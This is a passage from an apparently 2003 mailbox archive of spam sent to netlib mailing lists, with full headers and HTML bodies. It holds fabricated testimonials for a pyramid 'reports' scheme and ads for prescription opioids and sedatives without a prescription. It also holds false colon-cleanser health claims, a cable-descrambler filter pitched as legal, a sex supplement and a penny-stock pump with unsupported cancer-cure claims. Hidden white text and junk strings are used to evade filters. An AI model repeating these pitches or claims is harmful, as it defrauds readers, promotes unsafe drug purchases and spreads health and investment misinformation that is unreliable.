post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
tr b zt  wh 
ce wqyqkg zkeibvkcgxlj uowqwopauo

--E6DB_._2C._0A4._BB6--


From ngqanyyl@yahoo.com Fri Nov 28 19:13:51 2003
Return-Path: <ngqanyyl@yahoo.com>
Received: from ny-niagara-cmts6a-123.bflony.adelphia.net (ny-niagara-cmts6a-123.bflony.adelphia.net [67.21.135.123])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAT0DoMN020267;
	Fri, 28 Nov 2003 19:13:50 -0500 (EST)
Received: from [176.21.197.163] by ny-niagara-cmts6a-123.bflony.adelphia.net id ipn6utg39C11; Fri, 28 Nov 2003 21:13:30 -0300
Message-ID: <1j1a$n-6cn6kt6t$-1$0@q72tte>
From: "Lucia Brewster" <ngqanyyl@yahoo.com>
Reply-To: "Lucia Brewster" <ngqanyyl@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: RE:Xenical.l Valium.m Vicodin.n Xanax.x qr yiarqc zsc
Date: Fri, 28 Nov 03 21:13:30 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="130B9_CDDC_222.AFA96_CEC"
X-Priority: 3
X-MSMail-Priority: Normal


--130B9_CDDC_222.AFA96_CEC
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html




hq chj uoqfqjt 

 maesez
gxzgtu jocq pymaqn

--130B9_CDDC_222.AFA96_CEC--


From 04nffoood@yahoo.ca Fri Nov 28 23:30:24 2003
Return-Path: <04nffoood@yahoo.ca>
Received: from 160.36.58.108 ([221.152.132.174])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAT4UJMN022549;
	Fri, 28 Nov 2003 23:30:21 -0500 (EST)
Received: from [216.230.167.103] by 160.36.58.108 id FQEcvlm95l1w; Sat, 29 Nov 2003 05:21:48 +0000
Message-ID: <79v0-$-$$$r-x-y62-21-p$0qgs-pj@0we28jr37s964>
From: "Jame Duarte" <04nffoood@yahoo.ca>
Reply-To: "Jame Duarte" <04nffoood@yahoo.ca>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: **INFO ABOUT YOUR COLON** lbq   tnvsc
Date: Sat, 29 Nov 03 05:21:48 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8C6EF7_4C3"
X-Priority: 3
X-MSMail-Priority: Normal


--8C6EF7_4C3
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<div align=3D"center">
  <center>
  <table border=3D"0" cellspacing=3D"1" width=3D"100%">
    <tr>
      <td width=3D"100%">
        <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"100=
%" border=3D"0">
          <tbody>
            <tr>
              <td vAlign=3D"top" align=3D"left">
							  <font face=3D"Arial" color=3D"#800000" size=3D"4"><center>Approxi=
mately 156,000 Americans develop colon cancer annually.<br>Approximately 6=
0,000 will die from this disease.</center></font><p>
               </td>
            </tr>
          </tbody>
        </table>
        <b><font face=3D"Verdana, Geneva, Sans-Serif"><br>INTRODUCING:<fon=
t color=3D"#FFFFFF">wiojgiwjgwgrwg</font><strong><font color=3D"#cc0000" s=
ize=3D"5">ULTIMATE COLON CLEANSER</font></strong><br></font></b>
        <br><br><font face=3D"Arial" size=3D"2">You're about to discover t=
he true secrets 
        about your colon and digestive system and how it significantly imp=
acts 
        your health and enhances your weight loss program.  Plain, simple =
and to 
        the point information that is vitally important to your overall go=
od 
        health. Visit the site to learn how the Ultiamte Colon Cleanser wi=
ll clean your colon of toxins and unnecessary waste build up. Shipping is =
always free for US customers and we welcome International customers.<br><b=
><br><center>Through this very special email offer you can try the Ultimat=
e Colon Cleanser risk free for 30 days.</font></p><br>
        <align=3D"center"><b><font face=3D"Verdana" size=3D"3">
        <a href=3D"http://www.healthcolon.com/index.php?aid=3D186">Learn M=
ore</a></font></b></p>
      </td>
    </tr>
  </table>
  </center>
</div>
<p align=3D"left"><font size=3D"1" face=3D"Verdana"><br><br>
<a href=3D"http://www.healthcolon.com/remove.php">Remove
Me</a></font></p>
</body>
</html>
an mf bwdz stuunzqgbvjs opqiwiybyv
qqdzvahaojd yfkokb iqhkhisayaelqjrlgo smj
ff

--8C6EF7_4C3--


From jnw16rau@yahoo.com Fri Nov 28 23:49:46 2003
Return-Path: <jnw16rau@yahoo.com>
Received: from 160.36.58.108 ([61.130.225.252])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAT4nbMN023012;
	Fri, 28 Nov 2003 23:49:39 -0500 (EST)
Received: from (HELO bwhsdb) [62.18.73.119]
	by 160.36.58.108;
	Sat, 29 Nov 2003 21:48:19 +0200
Message-ID: <6k2cl--0psu$-d$$9a-mfql8bb@3hn1yhs>
From: "Tabitha Reeder" <jnw16rau@yahoo.com>
Reply-To: "Tabitha Reeder" <jnw16rau@yahoo.com>
To: b-archive@netlib2.cs.utk.edu
Cc: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Important Info about your Colon  qkt
Date: Sat, 29 Nov 03 21:48:19 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F0_25_BE_.4_.."
X-Priority: 3
X-MSMail-Priority: Normal


--F0_25_BE_.4_..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<div align=3D"center">
  <center>
  <table border=3D"0" cellspacing=3D"1" width=3D"100%">
    <tr>
      <td width=3D"100%">
        <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"100=
%" border=3D"0">
          <tbody>
            <tr>
              <td vAlign=3D"top" align=3D"left">
                <p><b><font face=3D"Verdana, Geneva, Sans-Serif">BRAND NEW=
 COLON 
                CLEANSER PRODUCT<br></font></b></td>
            </tr>
          </tbody>
        </table>
        <font face=3D"Arial" color=3D"#800000" size=3D"2"><strong>The aver=
age person 
        contains 5 to 25 pounds of waste build up in their colon.   
        This leads to being overweight, colon cancer, deadly toxins and pa=
rasite 
        build up.</strong></font><p>
        <font face=3D"Arial" size=3D"2">You're about to discover the true =
secrets 
        about your colon and digestive system and how it significantly imp=
acts 
        your health and enhances your weight loss program.  Plain, simple =
and to 
        the point information that is vitally important to your overall go=
od 
        health.</font> </p>
        <p align=3D"center"><b><font face=3D"Verdana" size=3D"3">
        <a href=3D"http://www.healthcolon.com/index.php?aid=3D186">More
        Information</a></font></b></p>
      </td>
    </tr>
  </table>
  </center>
</div>
<p align=3D"center"><font size=3D"1" face=3D"Verdana">
<a href=3D"http://www.healthcolon.com/remove.php">Remove
Me</a></font></p>
</body>
</html>mf  rmh sbkxmy zs
 l i  sjmot mjgal 
rsy vukk tz wfjm

--F0_25_BE_.4_..--


From d42pguytl@yahoo.ca Sat Nov 29 01:42:36 2003
Return-Path: <d42pguytl@yahoo.ca>
Received: from 200-158-50-137.dsl.telesp.net.br (200-158-50-137.dsl.telesp.net.br [200.158.50.137])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAT6gWMN026309;
	Sat, 29 Nov 2003 01:42:33 -0500 (EST)
Received: from [106.253.175.26] by 200-158-50-137.dsl.telesp.net.br with ESMTP id 8609F910A02; Sat, 29 Nov 2003 20:46:10 -0100
Message-ID: <i4-$8504-v06m@4pcql8007t2h>
From: "Trina Cleveland" <d42pguytl@yahoo.ca>
Reply-To: "Trina Cleveland" <d42pguytl@yahoo.ca>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Cleaner Colon af mygyevat i w
Date: Sat, 29 Nov 03 20:46:10 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="343D4D.86__E2BFD1D."
X-Priority: 3
X-MSMail-Priority: Normal


--343D4D.86__E2BFD1D.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<div align=3D"center">
  <center>
  <table border=3D"0" cellspacing=3D"1" width=3D"100%">
    <tr>
      <td width=3D"100%">
        <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"100=
%" border=3D"0">
          <tbody>
            <tr>
              <td vAlign=3D"top" align=3D"left">
							  <font face=3D"Arial" color=3D"#800000" size=3D"4"><center>Approxi=
mately 156,000 Americans develop colon cancer annually.<br>Approximately 6=
0,000 will die from this disease.</center></font><p>
               </td>
            </tr>
          </tbody>
        </table>
        <b><font face=3D"Verdana, Geneva, Sans-Serif"><br>INTRODUCING:<fon=
t color=3D"#FFFFFF">wiojgiwjgwgrwg</font><strong><font color=3D"#cc0000" s=
ize=3D"5">ULTIMATE COLON CLEANSER</font></strong><br></font></b>
        <br><br><font face=3D"Arial" size=3D"2">You're about to discover t=
he true secrets 
        about your colon and digestive system and how it significantly imp=
acts 
        your health and enhances your weight loss program.  Plain, simple =
and to 
        the point information that is vitally important to your overall go=
od 
        health. Visit the site to learn how the Ultiamte Colon Cleanser wi=
ll clean your colon of toxins and unnecessary waste build up. Shipping is =
always free for US customers and we welcome International customers.<br><b=
><br><center>Through this very special email offer you can try the Ultimat=
e Colon Cleanser risk free for 30 days.</font></p><br>
        <align=3D"center"><b><font face=3D"Verdana" size=3D"3">
        <a href=3D"http://www.healthcolon.com/index.php?aid=3D186">Learn M=
ore</a></font></b></p>
      </td>
    </tr>
  </table>
  </center>
</div>
<p align=3D"left"><font size=3D"1" face=3D"Verdana"><br><br>
<a href=3D"http://www.healthcolon.com/remove.php">Remove
Me</a></font></p>
</body>
</html>
r uuhae 
ps klrzokzajxeoxkmggj frg ufmc cqp y  g fhu

--343D4D.86__E2BFD1D.--


From sdzy99zyhj@yahoo.com Sat Nov 29 05:33:32 2003
Return-Path: <sdzy99zyhj@yahoo.com>
Received: from cabo-atol-ebt-140.atarde.com.br (cabo-atol-ebt-140.atarde.com.br [200.254.193.140] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hATAXBMN002525;
	Sat, 29 Nov 2003 05:33:16 -0500 (EST)
Received: from [149.145.164.250] by cabo-atol-ebt-140.atarde.com.br with SMTP; Sat, 29 Nov 2003 15:32:55 +0500
Message-ID: <5b$$l7655o11$77m2kf$u9347@0b84i.joexx.11>
From: "Lenard Early" <sdzy99zyhj@yahoo.com>
Reply-To: "Lenard Early" <sdzy99zyhj@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Xenical.l Valium.m Vicodin.n Xanax.x u
Date: Sat, 29 Nov 03 15:32:55 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="2.0_150D4C7221102EF900"
X-Priority: 3
X-MSMail-Priority: Normal


--2.0_150D4C7221102EF900
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html





fmugir
y
auo  i k sk oknhi t   qzssgce
 kazkgr o ittpy wbjo  zf  tzqby

--2.0_150D4C7221102EF900--


From 50tvvmum@yahoo.com Sat Nov 29 12:51:36 2003
Return-Path: <50tvvmum@yahoo.com>
Received: from mg034026.user.veloxzone.com.br (MG034026.user.veloxzone.com.br [200.165.34.26])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hATHpCMN008693;
	Sat, 29 Nov 2003 12:51:19 -0500 (EST)
Message-ID: <m0wi995y7p97aa$9teq-k869@h6t.mz>
From: "Tanisha Lester" <50tvvmum@yahoo.com>
Reply-To: "Tanisha Lester" <50tvvmum@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...axl
Date: Sat, 29 Nov 2003 23:01:37 +0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A_B6_3_BD4A.B.D"


--A_B6_3_BD4A.B.D
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Cable TV Subscribers

Get Our Cable TV Filter and Stop-Paying For Your Pay-Per-View, Mature Chan=
nels, Movie Channels, Sporting Events...


Find Out More - www.esavingsplus.com?refid=3D10010000859429816


Don't worry, it's perfectly-legal.  


Check out our legal page on the site: www.esavingsplus.com?refid=3D1001000=
0859429816







No more advertisments -  http://www.esavingsplus.com?unsub=3D1001000085942=
9816

























kvnm qvjojhlyg
gkrnipory pqtthlt
oci

--A_B6_3_BD4A.B.D--


From 9qwqoyiyom@yahoo.com Sun Nov 30 08:59:52 2003
Return-Path: <9qwqoyiyom@yahoo.com>
Received: from 160.36.58.108 (200-245-17-79.papalegua.com.br [200.245.17.79] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAUDxmMN002389;
	Sun, 30 Nov 2003 08:59:49 -0500 (EST)
Message-ID: <o78t5tve5a243m1sk3kuk5l5kcd9n@nt35q.wi12>
From: "Salvatore Sheppard" <9qwqoyiyom@yahoo.com>
Reply-To: "Salvatore Sheppard" <9qwqoyiyom@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: FINANCIAL Independence Is Calling You...andreas
Date: Sun, 30 Nov 2003 11:05:57 -0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BAA_EA29811AB6__.1"


--BAA_EA29811AB6__.1
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Got your attention?

Let me show you the way Financial Independence: www.saax.org?axel=3D49 









No more advertisements, thanks - www.5jzd.org/out5s/pre-rem2e.asp




























vykq gpn
 pickdvjd zr vljapmwkj yq  duedduq

--BAA_EA29811AB6__.1--


From 514yfqzxt@yahoo.com Sun Nov 30 19:43:29 2003
Return-Path: <514yfqzxt@yahoo.com>
Received: from c-67-168-3-18.client.comcast.net (c-67-168-3-18.client.comcast.net [67.168.3.18])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB10hIMN012599;
	Sun, 30 Nov 2003 19:43:24 -0500 (EST)
Received: from [122.182.160.173] by c-67-168-3-18.client.comcast.net id <7713469-89801>; Sun, 30 Nov 2003 19:41:11 -0500
Message-ID: <707$9$s2444r$31--012kv3@c5befth6db>
From: "Leslie Atkinson" <514yfqzxt@yahoo.com>
Reply-To: "Leslie Atkinson" <514yfqzxt@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>
Subject: Tramadol.l Vicodin.n Xanax.x Valium.m sddikque
Date: Sun, 30 Nov 03 19:41:11 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="226E_5D4D__2"
X-Priority: 3
X-MSMail-Priority: Normal


--226E_5D4D__2
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html




ckxgggkws mpubdbrs totkmeojk objj  uyssorvby fet
lxhqi wjyel
dldfbk

--226E_5D4D__2--


From kelly@msn.com Tue Dec  2 07:32:41 2003
Return-Path: <kelly@msn.com>
Received: from h00e018463404.ne.client2.attbi.com (h00e018463404.ne.client2.attbi.com [24.61.253.15])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB2CWdMN003934;
	Tue, 2 Dec 2003 07:32:40 -0500 (EST)
Received: from [157.143.126.74] by h00e018463404.ne.client2.attbi.com with SMTP; Tue, 02 Dec 2003 13:30:07 +0000
Message-ID: <i$6k52av$e$6--s-454f6c-kjbt-0@j46ki.6.x1p>
From: "Fanny Lowry" <kelly@msn.com>
Reply-To: "Fanny Lowry" <kelly@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Sports stars party tips  oc ioqbxn tlsnqgdw
Date: Tue, 02 Dec 03 13:30:07 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EEEEEB.D918EE7_02E.BC_8"
X-Priority: 3
X-MSMail-Priority: Normal


--EEEEEB.D918EE7_02E.BC_8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#FFCCFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine.</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verda=
na">Finally available to the public.<br>Alpha Male<br>The supplement that =
Male Porn Stars use</font></h4></center><br><center><h5><font color=3D"#FF=
FFFF" face=3D"verdana">Make love to her like no other man can. Orgasm afte=
r orgasm after orgasm.<br><br>Porn Stars shoot an entire movie in one day =
having sex many times with many different women.<br> Now you can have rock=
 hard orgasmic sex over and over again.<br>Just like the Porn Stars do<br>=
<br>Increase your testosterone 500%<br>Increase your sex drive<br>Increase=
 your virility<br>Increase the size of your penis<br>Never again experienc=
e premature ejaculation<br>She will never leave you alone when you give he=
r sex like she's never had before.<br><br>Doctor developed with a 100=
% Money Back Guarantee !</font></h5><h2><a href=3D"http://www.herbalmarts.=
biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster">Find Alpha Male Here</a></=
h2></center>

</body>
</html>
qlyzx l r ggfej hm fupjwubvbcxfas yda
 ernw nry ap

--EEEEEB.D918EE7_02E.BC_8--


From l92fwydo@yahoo.com Tue Dec  2 08:17:30 2003
Return-Path: <l92fwydo@yahoo.com>
Received: from 160.36.58.108 ([200.185.132.129])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB2DHLMN005306
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 2 Dec 2003 08:17:28 -0500 (EST)
Message-ID: <ua275h3n1scwb79w2448y9vamvg3@kld.9a.7bd0>
From: "Forrest Healy" <l92fwydo@yahoo.com>
Reply-To: "Forrest Healy" <l92fwydo@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US STOCK MARKET - HTDS Medical Research---CANCER Trials.....cristy
Date: Tue, 02 Dec 2003 19:04:03 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="__97_7B..DEC0_A"


--__97_7B..DEC0_A
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

US Stock Market - Stock Profile of the Week

Symbol: HTDS
Market: PK
Sector: MEDICAL RESEARCH


BARCHART Rates HTDS an 80% BUY - http://quotes.barchart.com/texpert.asp?sy=
m=3DHTDS


Before we begin our profile we have very exciting, breaking news...

Tubercin Passes Toxicity Trials - Ready To Proceed To Live Cancer Trials


BREAKING NEWS - DELRAY BEACH, Fla.--(BUSINESS WIRE)--Hard to Treat Disease=
s Incorporated (Pink Sheets:HTDS) announces that Tubercin=AE has passed th=
e toxicity tests required to proceed to the live cancer trials. Testing Tu=
bercin=AE on live Melanoma, Lung and Breast cancer cells will begin immedi=
ately.  The President and CEO, Mr. Colm J. King, met with the spokesperson=
 of the medical group at their offices in Oklahoma City. Mr. King was advi=
sed that the tests were conducted under strict FDA (Federal Drug Administr=
ation) guidelines. Full test results will be available at the corporate of=
fices as soon as the reports and findings are printed. 

"These are the most promising results to date regarding Tubercin=AE and we=
're looking forward to additional positive results in the near future," st=
ated Mr. King. "These tests prove that Tubercin=AE is non-toxic and is the=
 first step on the way to human clinical trials as well as the first posit=
ive breakthrough conducted in the United States with an independent medica=
l group for Tubercin=AE." 

Operating out of Delray Beach, Florida, Hard to Treat Diseases Incorporate=
d ("HTTD") holds the international marketing rights, except South Korea, t=
o Tubercin=AE, a patented immunostimulant developed for combating Cancer u=
nder medical patent (US Patent 6,274,356). The unique properties unlike ot=
her cancer products are clearly stated in the abstract summary of the pate=
nt... "A carbohydrate complex, which is a mixture of low molecular-weight =
polysaccharides of an arabinomannan structure extracted from Mycobacterium=
 tuberculosis, is highly effective in treating various cancer patients wit=
hout incurring any adverse side effects." 



STOCK PROFILE OF THE WEEK

HTDS is now at an emerging and potentially explosive stage.  As stated in =
their press release, Tubercin is now ready to proceed (after tests conduct=
ed under strict FDA guidelines) to human clinical trials.  While they have=
 jumped one very big hurdle, they are still in the early stages of develop=
ment and now is a great time for investors to take heed.



TUBERCIN

Over the past ten years, epoch making anticancer agents have continuously =
been introduced, but the mortality of cancer patients have been rising in =
the U.S. and the European countries not to mention Japan and Korea. The de=
cisive measure to cope with cancer is surgery.
  

When the cancer cells spread throughout the body instead of remaining on t=
he original spot, the treatment should take into consideration chemotherap=
y, radiation therapy and immunotherapy. The drawback of such therapies, ho=
wever, is they incur damages not only on cancer cells, but also on the nor=
mal cells. 
  

Chemotherapy and radiation therapy are not suitable for application on wea=
kened patients, especially those above 70. Historically, various forms of =
immunotherapy have been performed, falling short of therapeutic expectatio=
n. When Bacille calmetteguerin is used as an active no-specific immunother=
apeutic agent, however, the patient's prognosis turns better through a sim=
ulative action on immune system of the cancer case. 
  

Professor T.H. Chung of Korea extracted carbohydrate complex Tubercin from=
 microbacterium tuberculosis to be used as immunostimulant. This was meant=
 to activate the T-lymphocyte of the cancer patient to produce lymphokine.=
 This process strengthened and promoted immuno surveillance activities in =
deficient state and alleviated the pain and prolonged the life of cancer p=
atients.
  

Of late the pharmaceutical industry in advanced countries started to put o=
n the market so called cancer vaccines (active specific immunotherapy). Th=
e vaccines, bacterial extracts, as adjuvants, with autologous and or allog=
enic cancer cells to generate antibodies to cancer cells, facilitating the=
 killer T-cells to recognize and destroy cancer cells.
  

The laboratory work to modify autologous or allogenic cancer cells are not=
 ordinary and simple. When our lab work augments the active specific immun=
otherapeutic agents, the Tubercin will be one of the best adjuvants. Meanw=
hile, the main point of AIDS is its virus killing T-cells and Tubercin hel=
ps maintain healthy T-cells. Consequently, we focus our effort on the appl=
ication of Tubercin to AIDS.
  

TUBERCIN is derived from micro bacterium tuberculosis. As an immunostimula=
nt, TUBERCIN strengthens the human body's own immune system and assists th=
e body in seeking out and combating cancer cells. HTTD is potentially able=
 to develop TUBERCIN into a low-cost product to treat cancer patients on a=
n international scale. Salient treatment, through the administration of TU=
BERCIN, could positively affect thousands of lives in North America. In ad=
dition, Europe and Asia have millions of lives at risk each year because o=
f viral diseases such as cancer.
  

TUBERCIN IS A FINISHED PRODUCT. Tubercin as an inmunostimulant has been ad=
ministered to human patients in stages three and four of terminal cancer. =
There have been no indications of any adverse side effects in human trials=
 There has been encouraging results of patients with TUBERCIN in the last=
 fourteen years. Various forms of cancer were involved and many of the pat=
ients survived.
  

A review of clinical studies indicate TUBERCIN has no side effects and cou=
ld possibly be administered in conjunction with other such modalities for =
the treatment of cancer without any adverse effects. The scientific presum=
ption would be the distinct possibility of a strengthened immunity system =
and the administration of treatment such as chemotherapy at the later stag=
es of tumor growth would not be impeded by the weakened condition of the t=
erminal cancer patient. To this end the Company has been assisted by outsi=
de consultants reviewing the research data and human trials involving TUBE=
RCIN to see specifically whereby incidents of dual treatment produced favo=
rable results in terms of moving toward indication of prolongation of the =
life of the cancer patient.
  

There is recognition that morphine is an trusted pain killer, but in total=
ity it cannot be said that it has no side effects. In the maintaining of p=
atient care, there is the strong possibility that TUBERCIN could be also c=
onsidered as a candidate for a pain management. The Company's scientists d=
escribe TUBERCIN as having the high propensity of deadening the nerve endi=
ngs in specific areas of the body where cancer has caused erosion and cons=
equently much pain.



PATENTS

Presently, HTTD has the patent rights for Korea, Japan and the United Stat=
es. The Korean patent was issued on October 29, 1998 (Registration No. 173=
362). The Japanese patent was issued on June 12, 1998 (Registration No. 27=
90447). The United States patent was issued on August 14, 2001 (Registrati=
on No.6,274,356). Currently, patents are pending for Canada and Europe (th=
e United Kingdom, France, Germany, Italy and Spain).  



CANCER IN OUR TIME

In the 20th century, the number of cancer patients has been on the increas=
e. Although many anti-cancer agents were developed and an enormous study o=
n its essence continued, the mortality by cancer still is increasing. Mank=
ind may be chronically threatened with cancer in the 21st century. Nine mi=
llion new case of cancer occur annually and five million people die from b=
reast cancer, reports the World Health Organization. Dramatic increases in=
 life expectancy and change in lifestyle are estimated to increase the num=
ber of new cancer cases to 20 million annually by 2020 and cancer deaths t=
o more than 10 million. 

About 552,200 Americans - more than 1,500 people a day - are excepted to d=
ie of cancer this year. In the United States, one of every four deaths is =
attributed to cancer. Cancer is the second-leading cause of death in the U=
nited States. Exceeded only by heart disease. About 5 million lives have b=
een lost to cancer since 1990 and about 13 million new cases have been dia=
gnosed. In 2000, more then 1.2 million new cancer cases are expected to be=
